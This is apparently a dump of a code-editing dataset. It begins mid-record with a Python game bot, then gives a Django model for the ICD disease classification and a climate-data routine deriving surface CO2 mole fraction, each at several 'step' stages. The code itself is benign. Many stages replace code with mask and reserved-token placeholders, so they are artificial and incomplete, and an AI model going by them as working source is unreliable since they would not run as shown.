q_values.append(np.dot(sp_ap, self.weights))\n return list(self.action_mapper.triples[np.argmax(q_values)])\n\n def write_action(self):\n action_list = self.__get_next_action(self.state)\n if not np.all(action_list == DO_NOTHING_ACTION) and action_list[2\n ] != -1:\n self.command = str(action_list[0]) + ',' + str(action_list[1]\n ) + ',' + str(action_list[2])\n with open('command.txt', 'w') as outfl:\n outfl.write(self.command)\n\n\nif __name__ == '__main__':\n with open(CONFIG_FILENAME, 'r') as f:\n data = json.load(f)\n player_name = data['nickName']\n player = 'A' if player_name == 'Guido' else 'B'\n bot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n bot.write_action()\n",
"step-5": "import numpy as np \nimport json \nimport random\nfrom encapsulate_state import StateEncapsulator\nfrom scalar_to_action import ActionMapper\nimport pickle\nfrom basis_functions import identity_basis, interactive_basis, actions_only_basis, actions_cubic_basis, BASIS_MAP\nimport matplotlib.pyplot as plt\n\nSTATE_FILENAME = \"state3.json\"\nCONFIG_FILENAME = \"bot.json\"\nWEIGHTS_FILENAME = \"weights.pkl\"\nDO_NOTHING_ACTION = [-1, -1, -1]\n\nclass LinearBot(object):\n\t\tdef __init__(self, player, player_name, weights_file, basis):\n\t\t\tself.reader = StateEncapsulator(player, player_name)\n\n\t\t\twith open(STATE_FILENAME, \"r\") as f:\n\t\t\t\tdata = json.load(f)\n\t\t\tself.state = self.reader.parse_state(data)\n\n\t\t\twith open(weights_file, \"rb\") as pkl:\n\t\t\t\tself.weights = pickle.load(pkl)\n\n\t\t\tself.action_mapper = ActionMapper()\n\t\t\tself.basis = basis\n\t\t\tself.command = \"\"\n\n\t\t# Expects as input a 3D tensor representing the state, un-flattened; returns a list action\n\t\tdef __get_next_action(self, sp):\n\t\t\tsp = sp.flatten()\n\t\t\tq_values = []\n\t\t\tfor action in self.action_mapper.triples:\n\t\t\t\tsp_ap = np.array(list(sp) + list(action))\n\t\t\t\tsp_ap = self.basis(sp_ap)\n\t\t\t\tq_values.append(np.dot(sp_ap, self.weights))\n\n\t\t\treturn list(self.action_mapper.triples[np.argmax(q_values)])\n\n\t\tdef write_action(self):\n\t\t\taction_list = self.__get_next_action(self.state)\n\t\t\tif (not np.all(action_list == DO_NOTHING_ACTION)) and action_list[2] != -1:\n\t\t\t\tself.command = str(action_list[0]) + \",\" + str(action_list[1]) + \",\" + str(action_list[2])\n\t\t\twith open(\"command.txt\", \"w\") as outfl:\n\t\t\t\toutfl.write(self.command)\n\n############################################################################################\n\nif __name__ == \"__main__\":\n\twith open(CONFIG_FILENAME, \"r\") as f:\n\t\tdata = json.load(f)\n\t\tplayer_name = data[\"nickName\"]\n\t\tplayer = \"A\" if player_name == \"Guido\" else \"B\"\n\n\tbot = LinearBot(player, player_name, WEIGHTS_FILENAME, actions_cubic_basis)\n\tbot.write_action()\n\t",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
class ClassMKB(models.Model):
name = models.CharField(max_length=512,verbose_name = 'Наименование')
code = models.CharField(max_length=20, null=True, blank=True,verbose_name = 'Код')
parent_id = models.IntegerField(null=True, blank=True)
parent_code = models.CharField(max_length=100, null=True, blank=True,verbose_name = 'Код предка')
node_count = models.SmallIntegerField(default=0, null=True, blank=True,verbose_name = 'Количество в группе')
additional_info = models.TextField(null=True, blank=True,verbose_name = 'Дополнительно')
class Meta:
db_table = 'class_mkb'
verbose_name = 'Международная класификация болезней'
verbose_name_plural = 'Международная класификация болезней'
def __unicode__(self):
return self.name
|
normal
|
{
"blob_id": "8753996c90ecea685e6312020dfd31fabb366138",
"index": 5270,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ClassMKB(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'class_mkb'\n verbose_name = 'Международная класификация болезней'\n verbose_name_plural = 'Международная класификация болезней'\n\n def __unicode__(self):\n return self.name\n",
"step-3": "<mask token>\n\n\nclass ClassMKB(models.Model):\n name = models.CharField(max_length=512, verbose_name='Наименование')\n code = models.CharField(max_length=20, null=True, blank=True,\n verbose_name='Код')\n parent_id = models.IntegerField(null=True, blank=True)\n parent_code = models.CharField(max_length=100, null=True, blank=True,\n verbose_name='Код предка')\n node_count = models.SmallIntegerField(default=0, null=True, blank=True,\n verbose_name='Количество в группе')\n additional_info = models.TextField(null=True, blank=True, verbose_name=\n 'Дополнительно')\n\n\n class Meta:\n db_table = 'class_mkb'\n verbose_name = 'Международная класификация болезней'\n verbose_name_plural = 'Международная класификация болезней'\n\n def __unicode__(self):\n return self.name\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import models\n\n\nclass ClassMKB(models.Model):\n name = models.CharField(max_length=512, verbose_name='Наименование')\n code = models.CharField(max_length=20, null=True, blank=True,\n verbose_name='Код')\n parent_id = models.IntegerField(null=True, blank=True)\n parent_code = models.CharField(max_length=100, null=True, blank=True,\n verbose_name='Код предка')\n node_count = models.SmallIntegerField(default=0, null=True, blank=True,\n verbose_name='Количество в группе')\n additional_info = models.TextField(null=True, blank=True, verbose_name=\n 'Дополнительно')\n\n\n class Meta:\n db_table = 'class_mkb'\n verbose_name = 'Международная класификация болезней'\n verbose_name_plural = 'Международная класификация болезней'\n\n def __unicode__(self):\n return self.name\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db import models\n\n\nclass ClassMKB(models.Model):\n\n name = models.CharField(max_length=512,verbose_name = 'Наименование')\n code = models.CharField(max_length=20, null=True, blank=True,verbose_name = 'Код')\n parent_id = models.IntegerField(null=True, blank=True)\n parent_code = models.CharField(max_length=100, null=True, blank=True,verbose_name = 'Код предка')\n node_count = models.SmallIntegerField(default=0, null=True, blank=True,verbose_name = 'Количество в группе')\n additional_info = models.TextField(null=True, blank=True,verbose_name = 'Дополнительно')\n\n class Meta:\n db_table = 'class_mkb'\n verbose_name = 'Международная класификация болезней'\n verbose_name_plural = 'Международная класификация болезней'\n\n def __unicode__(self):\n return self.name",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class DerivedVariable(DerivedVariableBase):
<|reserved_special_token_0|>
@staticmethod
def required(project):
"""Declare the variables needed for derivation."""
required = [{'short_name': 'co2'}, {'short_name': 'ps'}]
return required
@staticmethod
def calculate(cubes):
"""Compute mole fraction of CO2 at surface."""
co2_cube = cubes.extract_cube(iris.Constraint(name=
'mole_fraction_of_carbon_dioxide_in_air'))
ps_cube = cubes.extract_cube(iris.Constraint(name=
'surface_air_pressure'))
z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)
)
mask = da.ma.getmaskarray(co2_cube.core_data())
if mask.any():
first_unmasked_data = _get_first_unmasked_data(co2_cube.
core_data(), axis=z_axis)
dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]
first_unmasked_data = iris.util.broadcast_to_shape(
first_unmasked_data, co2_cube.shape, dim_map)
co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.
core_data())
air_pressure_coord = co2_cube.coord('air_pressure')
original_levels = iris.util.broadcast_to_shape(air_pressure_coord.
points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))
target_levels = np.expand_dims(ps_cube.data, axis=z_axis)
co2s_data = stratify.interpolate(target_levels, original_levels,
co2_cube.data, axis=z_axis, interpolation='linear',
extrapolation='linear')
co2s_data = np.squeeze(co2s_data, axis=z_axis)
indices = [slice(None)] * co2_cube.ndim
indices[z_axis] = 0
co2s_cube = co2_cube[tuple(indices)]
co2s_cube.data = co2s_data
if co2s_cube.coords('air_pressure'):
co2s_cube.remove_coord('air_pressure')
ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',
standard_name='air_pressure', long_name='pressure', units=
ps_cube.units)
co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))
co2s_cube.convert_units('1e-6')
return co2s_cube
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DerivedVariable(DerivedVariableBase):
"""Derivation of variable ``co2s``.
Use linear interpolation/extrapolation and surface air pressure to
calculate CO2 mole fraction at surface.
Note
----
In some cases, ``co2`` data is masked. In these cases, the masked values
correspond to values where the pressure level is higher than the surface
air pressure (e.g. the 1000 hPa level for grid cells with high elevation).
To obtain an unmasked ``co2s`` field, it is necessary to fill these masked
values accordingly, i.e. with the lowest unmasked value for each grid cell.
"""
@staticmethod
def required(project):
"""Declare the variables needed for derivation."""
required = [{'short_name': 'co2'}, {'short_name': 'ps'}]
return required
@staticmethod
def calculate(cubes):
"""Compute mole fraction of CO2 at surface."""
co2_cube = cubes.extract_cube(iris.Constraint(name=
'mole_fraction_of_carbon_dioxide_in_air'))
ps_cube = cubes.extract_cube(iris.Constraint(name=
'surface_air_pressure'))
z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)
)
mask = da.ma.getmaskarray(co2_cube.core_data())
if mask.any():
first_unmasked_data = _get_first_unmasked_data(co2_cube.
core_data(), axis=z_axis)
dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]
first_unmasked_data = iris.util.broadcast_to_shape(
first_unmasked_data, co2_cube.shape, dim_map)
co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.
core_data())
air_pressure_coord = co2_cube.coord('air_pressure')
original_levels = iris.util.broadcast_to_shape(air_pressure_coord.
points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))
target_levels = np.expand_dims(ps_cube.data, axis=z_axis)
co2s_data = stratify.interpolate(target_levels, original_levels,
co2_cube.data, axis=z_axis, interpolation='linear',
extrapolation='linear')
co2s_data = np.squeeze(co2s_data, axis=z_axis)
indices = [slice(None)] * co2_cube.ndim
indices[z_axis] = 0
co2s_cube = co2_cube[tuple(indices)]
co2s_cube.data = co2s_data
if co2s_cube.coords('air_pressure'):
co2s_cube.remove_coord('air_pressure')
ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',
standard_name='air_pressure', long_name='pressure', units=
ps_cube.units)
co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))
co2s_cube.convert_units('1e-6')
return co2s_cube
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _get_first_unmasked_data(array, axis):
"""Get first unmasked value of an array along an axis."""
mask = da.ma.getmaskarray(array)
numerical_mask = da.where(mask, -1.0, 1.0)
indices_first_positive = da.argmax(numerical_mask, axis=axis)
indices = da.meshgrid(*[da.arange(array.shape[i]) for i in range(array.
ndim) if i != axis], indexing='ij')
indices.insert(axis, indices_first_positive)
first_unmasked_data = np.array(array)[tuple(indices)]
return first_unmasked_data
class DerivedVariable(DerivedVariableBase):
"""Derivation of variable ``co2s``.
Use linear interpolation/extrapolation and surface air pressure to
calculate CO2 mole fraction at surface.
Note
----
In some cases, ``co2`` data is masked. In these cases, the masked values
correspond to values where the pressure level is higher than the surface
air pressure (e.g. the 1000 hPa level for grid cells with high elevation).
To obtain an unmasked ``co2s`` field, it is necessary to fill these masked
values accordingly, i.e. with the lowest unmasked value for each grid cell.
"""
@staticmethod
def required(project):
"""Declare the variables needed for derivation."""
required = [{'short_name': 'co2'}, {'short_name': 'ps'}]
return required
@staticmethod
def calculate(cubes):
"""Compute mole fraction of CO2 at surface."""
co2_cube = cubes.extract_cube(iris.Constraint(name=
'mole_fraction_of_carbon_dioxide_in_air'))
ps_cube = cubes.extract_cube(iris.Constraint(name=
'surface_air_pressure'))
z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)
)
mask = da.ma.getmaskarray(co2_cube.core_data())
if mask.any():
first_unmasked_data = _get_first_unmasked_data(co2_cube.
core_data(), axis=z_axis)
dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]
first_unmasked_data = iris.util.broadcast_to_shape(
first_unmasked_data, co2_cube.shape, dim_map)
co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.
core_data())
air_pressure_coord = co2_cube.coord('air_pressure')
original_levels = iris.util.broadcast_to_shape(air_pressure_coord.
points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))
target_levels = np.expand_dims(ps_cube.data, axis=z_axis)
co2s_data = stratify.interpolate(target_levels, original_levels,
co2_cube.data, axis=z_axis, interpolation='linear',
extrapolation='linear')
co2s_data = np.squeeze(co2s_data, axis=z_axis)
indices = [slice(None)] * co2_cube.ndim
indices[z_axis] = 0
co2s_cube = co2_cube[tuple(indices)]
co2s_cube.data = co2s_data
if co2s_cube.coords('air_pressure'):
co2s_cube.remove_coord('air_pressure')
ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',
standard_name='air_pressure', long_name='pressure', units=
ps_cube.units)
co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))
co2s_cube.convert_units('1e-6')
return co2s_cube
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import dask.array as da
import iris
import numpy as np
import stratify
from ._baseclass import DerivedVariableBase
def _get_first_unmasked_data(array, axis):
"""Get first unmasked value of an array along an axis."""
mask = da.ma.getmaskarray(array)
numerical_mask = da.where(mask, -1.0, 1.0)
indices_first_positive = da.argmax(numerical_mask, axis=axis)
indices = da.meshgrid(*[da.arange(array.shape[i]) for i in range(array.
ndim) if i != axis], indexing='ij')
indices.insert(axis, indices_first_positive)
first_unmasked_data = np.array(array)[tuple(indices)]
return first_unmasked_data
class DerivedVariable(DerivedVariableBase):
"""Derivation of variable ``co2s``.
Use linear interpolation/extrapolation and surface air pressure to
calculate CO2 mole fraction at surface.
Note
----
In some cases, ``co2`` data is masked. In these cases, the masked values
correspond to values where the pressure level is higher than the surface
air pressure (e.g. the 1000 hPa level for grid cells with high elevation).
To obtain an unmasked ``co2s`` field, it is necessary to fill these masked
values accordingly, i.e. with the lowest unmasked value for each grid cell.
"""
@staticmethod
def required(project):
"""Declare the variables needed for derivation."""
required = [{'short_name': 'co2'}, {'short_name': 'ps'}]
return required
@staticmethod
def calculate(cubes):
"""Compute mole fraction of CO2 at surface."""
co2_cube = cubes.extract_cube(iris.Constraint(name=
'mole_fraction_of_carbon_dioxide_in_air'))
ps_cube = cubes.extract_cube(iris.Constraint(name=
'surface_air_pressure'))
z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)
)
mask = da.ma.getmaskarray(co2_cube.core_data())
if mask.any():
first_unmasked_data = _get_first_unmasked_data(co2_cube.
core_data(), axis=z_axis)
dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]
first_unmasked_data = iris.util.broadcast_to_shape(
first_unmasked_data, co2_cube.shape, dim_map)
co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.
core_data())
air_pressure_coord = co2_cube.coord('air_pressure')
original_levels = iris.util.broadcast_to_shape(air_pressure_coord.
points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))
target_levels = np.expand_dims(ps_cube.data, axis=z_axis)
co2s_data = stratify.interpolate(target_levels, original_levels,
co2_cube.data, axis=z_axis, interpolation='linear',
extrapolation='linear')
co2s_data = np.squeeze(co2s_data, axis=z_axis)
indices = [slice(None)] * co2_cube.ndim
indices[z_axis] = 0
co2s_cube = co2_cube[tuple(indices)]
co2s_cube.data = co2s_data
if co2s_cube.coords('air_pressure'):
co2s_cube.remove_coord('air_pressure')
ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',
standard_name='air_pressure', long_name='pressure', units=
ps_cube.units)
co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))
co2s_cube.convert_units('1e-6')
return co2s_cube
<|reserved_special_token_1|>
"""Derivation of variable ``co2s``."""
import dask.array as da
import iris
import numpy as np
import stratify
from ._baseclass import DerivedVariableBase
def _get_first_unmasked_data(array, axis):
"""Get first unmasked value of an array along an axis."""
mask = da.ma.getmaskarray(array)
numerical_mask = da.where(mask, -1.0, 1.0)
indices_first_positive = da.argmax(numerical_mask, axis=axis)
indices = da.meshgrid(
*[da.arange(array.shape[i]) for i in range(array.ndim) if i != axis],
indexing='ij')
indices.insert(axis, indices_first_positive)
first_unmasked_data = np.array(array)[tuple(indices)]
return first_unmasked_data
class DerivedVariable(DerivedVariableBase):
"""Derivation of variable ``co2s``.
Use linear interpolation/extrapolation and surface air pressure to
calculate CO2 mole fraction at surface.
Note
----
In some cases, ``co2`` data is masked. In these cases, the masked values
correspond to values where the pressure level is higher than the surface
air pressure (e.g. the 1000 hPa level for grid cells with high elevation).
To obtain an unmasked ``co2s`` field, it is necessary to fill these masked
values accordingly, i.e. with the lowest unmasked value for each grid cell.
"""
@staticmethod
def required(project):
"""Declare the variables needed for derivation."""
required = [{'short_name': 'co2'}, {'short_name': 'ps'}]
return required
@staticmethod
def calculate(cubes):
"""Compute mole fraction of CO2 at surface."""
co2_cube = cubes.extract_cube(
iris.Constraint(name='mole_fraction_of_carbon_dioxide_in_air'))
ps_cube = cubes.extract_cube(
iris.Constraint(name='surface_air_pressure'))
# Fill masked data if necessary (interpolation fails with masked data)
(z_axis,) = co2_cube.coord_dims(co2_cube.coord(axis='Z',
dim_coords=True))
mask = da.ma.getmaskarray(co2_cube.core_data())
if mask.any():
first_unmasked_data = _get_first_unmasked_data(
co2_cube.core_data(), axis=z_axis)
dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]
first_unmasked_data = iris.util.broadcast_to_shape(
first_unmasked_data, co2_cube.shape, dim_map)
co2_cube.data = da.where(mask, first_unmasked_data,
co2_cube.core_data())
# Interpolation (not supported for dask arrays)
air_pressure_coord = co2_cube.coord('air_pressure')
original_levels = iris.util.broadcast_to_shape(
air_pressure_coord.points, co2_cube.shape,
co2_cube.coord_dims(air_pressure_coord))
target_levels = np.expand_dims(ps_cube.data, axis=z_axis)
co2s_data = stratify.interpolate(
target_levels,
original_levels,
co2_cube.data,
axis=z_axis,
interpolation='linear',
extrapolation='linear',
)
co2s_data = np.squeeze(co2s_data, axis=z_axis)
# Construct co2s cube
indices = [slice(None)] * co2_cube.ndim
indices[z_axis] = 0
co2s_cube = co2_cube[tuple(indices)]
co2s_cube.data = co2s_data
if co2s_cube.coords('air_pressure'):
co2s_cube.remove_coord('air_pressure')
ps_coord = iris.coords.AuxCoord(ps_cube.data,
var_name='plev',
standard_name='air_pressure',
long_name='pressure',
units=ps_cube.units)
co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))
co2s_cube.convert_units('1e-6')
return co2s_cube
|
flexible
|
{
"blob_id": "7c9b68b2d32d8e435f332d4412ea1ba899607ec4",
"index": 9395,
"step-1": "<mask token>\n\n\nclass DerivedVariable(DerivedVariableBase):\n <mask token>\n\n @staticmethod\n def required(project):\n \"\"\"Declare the variables needed for derivation.\"\"\"\n required = [{'short_name': 'co2'}, {'short_name': 'ps'}]\n return required\n\n @staticmethod\n def calculate(cubes):\n \"\"\"Compute mole fraction of CO2 at surface.\"\"\"\n co2_cube = cubes.extract_cube(iris.Constraint(name=\n 'mole_fraction_of_carbon_dioxide_in_air'))\n ps_cube = cubes.extract_cube(iris.Constraint(name=\n 'surface_air_pressure'))\n z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)\n )\n mask = da.ma.getmaskarray(co2_cube.core_data())\n if mask.any():\n first_unmasked_data = _get_first_unmasked_data(co2_cube.\n core_data(), axis=z_axis)\n dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]\n first_unmasked_data = iris.util.broadcast_to_shape(\n first_unmasked_data, co2_cube.shape, dim_map)\n co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.\n core_data())\n air_pressure_coord = co2_cube.coord('air_pressure')\n original_levels = iris.util.broadcast_to_shape(air_pressure_coord.\n points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))\n target_levels = np.expand_dims(ps_cube.data, axis=z_axis)\n co2s_data = stratify.interpolate(target_levels, original_levels,\n co2_cube.data, axis=z_axis, interpolation='linear',\n extrapolation='linear')\n co2s_data = np.squeeze(co2s_data, axis=z_axis)\n indices = [slice(None)] * co2_cube.ndim\n indices[z_axis] = 0\n co2s_cube = co2_cube[tuple(indices)]\n co2s_cube.data = co2s_data\n if co2s_cube.coords('air_pressure'):\n co2s_cube.remove_coord('air_pressure')\n ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',\n standard_name='air_pressure', long_name='pressure', units=\n ps_cube.units)\n co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))\n co2s_cube.convert_units('1e-6')\n return co2s_cube\n",
"step-2": "<mask token>\n\n\nclass DerivedVariable(DerivedVariableBase):\n \"\"\"Derivation of variable ``co2s``.\n\n Use linear interpolation/extrapolation and surface air pressure to\n calculate CO2 mole fraction at surface.\n\n Note\n ----\n In some cases, ``co2`` data is masked. In these cases, the masked values\n correspond to values where the pressure level is higher than the surface\n air pressure (e.g. the 1000 hPa level for grid cells with high elevation).\n To obtain an unmasked ``co2s`` field, it is necessary to fill these masked\n values accordingly, i.e. with the lowest unmasked value for each grid cell.\n\n \"\"\"\n\n @staticmethod\n def required(project):\n \"\"\"Declare the variables needed for derivation.\"\"\"\n required = [{'short_name': 'co2'}, {'short_name': 'ps'}]\n return required\n\n @staticmethod\n def calculate(cubes):\n \"\"\"Compute mole fraction of CO2 at surface.\"\"\"\n co2_cube = cubes.extract_cube(iris.Constraint(name=\n 'mole_fraction_of_carbon_dioxide_in_air'))\n ps_cube = cubes.extract_cube(iris.Constraint(name=\n 'surface_air_pressure'))\n z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)\n )\n mask = da.ma.getmaskarray(co2_cube.core_data())\n if mask.any():\n first_unmasked_data = _get_first_unmasked_data(co2_cube.\n core_data(), axis=z_axis)\n dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]\n first_unmasked_data = iris.util.broadcast_to_shape(\n first_unmasked_data, co2_cube.shape, dim_map)\n co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.\n core_data())\n air_pressure_coord = co2_cube.coord('air_pressure')\n original_levels = iris.util.broadcast_to_shape(air_pressure_coord.\n points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))\n target_levels = np.expand_dims(ps_cube.data, axis=z_axis)\n co2s_data = stratify.interpolate(target_levels, original_levels,\n co2_cube.data, axis=z_axis, interpolation='linear',\n extrapolation='linear')\n co2s_data = np.squeeze(co2s_data, axis=z_axis)\n indices = [slice(None)] * co2_cube.ndim\n indices[z_axis] = 0\n co2s_cube = co2_cube[tuple(indices)]\n co2s_cube.data = co2s_data\n if co2s_cube.coords('air_pressure'):\n co2s_cube.remove_coord('air_pressure')\n ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',\n standard_name='air_pressure', long_name='pressure', units=\n ps_cube.units)\n co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))\n co2s_cube.convert_units('1e-6')\n return co2s_cube\n",
"step-3": "<mask token>\n\n\ndef _get_first_unmasked_data(array, axis):\n \"\"\"Get first unmasked value of an array along an axis.\"\"\"\n mask = da.ma.getmaskarray(array)\n numerical_mask = da.where(mask, -1.0, 1.0)\n indices_first_positive = da.argmax(numerical_mask, axis=axis)\n indices = da.meshgrid(*[da.arange(array.shape[i]) for i in range(array.\n ndim) if i != axis], indexing='ij')\n indices.insert(axis, indices_first_positive)\n first_unmasked_data = np.array(array)[tuple(indices)]\n return first_unmasked_data\n\n\nclass DerivedVariable(DerivedVariableBase):\n \"\"\"Derivation of variable ``co2s``.\n\n Use linear interpolation/extrapolation and surface air pressure to\n calculate CO2 mole fraction at surface.\n\n Note\n ----\n In some cases, ``co2`` data is masked. In these cases, the masked values\n correspond to values where the pressure level is higher than the surface\n air pressure (e.g. the 1000 hPa level for grid cells with high elevation).\n To obtain an unmasked ``co2s`` field, it is necessary to fill these masked\n values accordingly, i.e. with the lowest unmasked value for each grid cell.\n\n \"\"\"\n\n @staticmethod\n def required(project):\n \"\"\"Declare the variables needed for derivation.\"\"\"\n required = [{'short_name': 'co2'}, {'short_name': 'ps'}]\n return required\n\n @staticmethod\n def calculate(cubes):\n \"\"\"Compute mole fraction of CO2 at surface.\"\"\"\n co2_cube = cubes.extract_cube(iris.Constraint(name=\n 'mole_fraction_of_carbon_dioxide_in_air'))\n ps_cube = cubes.extract_cube(iris.Constraint(name=\n 'surface_air_pressure'))\n z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)\n )\n mask = da.ma.getmaskarray(co2_cube.core_data())\n if mask.any():\n first_unmasked_data = _get_first_unmasked_data(co2_cube.\n core_data(), axis=z_axis)\n dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]\n first_unmasked_data = iris.util.broadcast_to_shape(\n first_unmasked_data, co2_cube.shape, dim_map)\n co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.\n core_data())\n air_pressure_coord = co2_cube.coord('air_pressure')\n original_levels = iris.util.broadcast_to_shape(air_pressure_coord.\n points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))\n target_levels = np.expand_dims(ps_cube.data, axis=z_axis)\n co2s_data = stratify.interpolate(target_levels, original_levels,\n co2_cube.data, axis=z_axis, interpolation='linear',\n extrapolation='linear')\n co2s_data = np.squeeze(co2s_data, axis=z_axis)\n indices = [slice(None)] * co2_cube.ndim\n indices[z_axis] = 0\n co2s_cube = co2_cube[tuple(indices)]\n co2s_cube.data = co2s_data\n if co2s_cube.coords('air_pressure'):\n co2s_cube.remove_coord('air_pressure')\n ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',\n standard_name='air_pressure', long_name='pressure', units=\n ps_cube.units)\n co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))\n co2s_cube.convert_units('1e-6')\n return co2s_cube\n",
"step-4": "<mask token>\nimport dask.array as da\nimport iris\nimport numpy as np\nimport stratify\nfrom ._baseclass import DerivedVariableBase\n\n\ndef _get_first_unmasked_data(array, axis):\n \"\"\"Get first unmasked value of an array along an axis.\"\"\"\n mask = da.ma.getmaskarray(array)\n numerical_mask = da.where(mask, -1.0, 1.0)\n indices_first_positive = da.argmax(numerical_mask, axis=axis)\n indices = da.meshgrid(*[da.arange(array.shape[i]) for i in range(array.\n ndim) if i != axis], indexing='ij')\n indices.insert(axis, indices_first_positive)\n first_unmasked_data = np.array(array)[tuple(indices)]\n return first_unmasked_data\n\n\nclass DerivedVariable(DerivedVariableBase):\n \"\"\"Derivation of variable ``co2s``.\n\n Use linear interpolation/extrapolation and surface air pressure to\n calculate CO2 mole fraction at surface.\n\n Note\n ----\n In some cases, ``co2`` data is masked. In these cases, the masked values\n correspond to values where the pressure level is higher than the surface\n air pressure (e.g. the 1000 hPa level for grid cells with high elevation).\n To obtain an unmasked ``co2s`` field, it is necessary to fill these masked\n values accordingly, i.e. with the lowest unmasked value for each grid cell.\n\n \"\"\"\n\n @staticmethod\n def required(project):\n \"\"\"Declare the variables needed for derivation.\"\"\"\n required = [{'short_name': 'co2'}, {'short_name': 'ps'}]\n return required\n\n @staticmethod\n def calculate(cubes):\n \"\"\"Compute mole fraction of CO2 at surface.\"\"\"\n co2_cube = cubes.extract_cube(iris.Constraint(name=\n 'mole_fraction_of_carbon_dioxide_in_air'))\n ps_cube = cubes.extract_cube(iris.Constraint(name=\n 'surface_air_pressure'))\n z_axis, = co2_cube.coord_dims(co2_cube.coord(axis='Z', dim_coords=True)\n )\n mask = da.ma.getmaskarray(co2_cube.core_data())\n if mask.any():\n first_unmasked_data = _get_first_unmasked_data(co2_cube.\n core_data(), axis=z_axis)\n dim_map = [dim for dim in range(co2_cube.ndim) if dim != z_axis]\n first_unmasked_data = iris.util.broadcast_to_shape(\n first_unmasked_data, co2_cube.shape, dim_map)\n co2_cube.data = da.where(mask, first_unmasked_data, co2_cube.\n core_data())\n air_pressure_coord = co2_cube.coord('air_pressure')\n original_levels = iris.util.broadcast_to_shape(air_pressure_coord.\n points, co2_cube.shape, co2_cube.coord_dims(air_pressure_coord))\n target_levels = np.expand_dims(ps_cube.data, axis=z_axis)\n co2s_data = stratify.interpolate(target_levels, original_levels,\n co2_cube.data, axis=z_axis, interpolation='linear',\n extrapolation='linear')\n co2s_data = np.squeeze(co2s_data, axis=z_axis)\n indices = [slice(None)] * co2_cube.ndim\n indices[z_axis] = 0\n co2s_cube = co2_cube[tuple(indices)]\n co2s_cube.data = co2s_data\n if co2s_cube.coords('air_pressure'):\n co2s_cube.remove_coord('air_pressure')\n ps_coord = iris.coords.AuxCoord(ps_cube.data, var_name='plev',\n standard_name='air_pressure', long_name='pressure', units=\n ps_cube.units)\n co2s_cube.add_aux_coord(ps_coord, np.arange(co2s_cube.ndim))\n co2s_cube.convert_units('1e-6')\n return co2s_cube\n",
